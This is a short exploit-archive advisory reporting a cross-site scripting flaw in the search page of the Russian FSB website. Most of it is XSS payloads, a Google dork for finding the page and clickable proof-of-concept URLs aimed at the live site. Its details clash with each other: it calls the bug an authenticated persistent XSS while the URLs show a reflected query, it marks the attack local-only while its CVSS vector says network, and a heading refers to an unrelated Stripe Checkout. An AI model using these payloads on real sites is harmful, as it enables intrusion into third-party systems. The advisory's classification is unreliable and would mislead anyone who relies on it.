Russian FSB Cross Site Scripting

2024.12.03
Credit: E1.Coders
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-79

/*! - # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation - # Authenticated Persistent XSS - # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query= - # DATE: 2024-11-29 - # SECURITY RESEARCHER:  E1.Coders - # VENDOR: FSB [ http://www.fsb.ru/ ] - # SOFTWARE LINK: http://www.fsb.ru/ - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 */     ### -- [ Info: ]   [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.   [i] Vulnerable parameter(s): sh.htm?query=  < AND >  /fsb/sh.htm?query=     ### -- [ Impact: ]   [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.     ### -- [ Payloads: ]   `"'><img src=xxx:x \x22onerror=javascript:alert(1)>   "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />   `"'><img src=xxx:x onerror\x09=javascript:alert(1)>     ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]   http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E   http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E   http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E     ### -- [ Contacts: ]   [+] E-Mail: E1.Coders@Mail.Ru   [+] GitHub: @e1coders


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top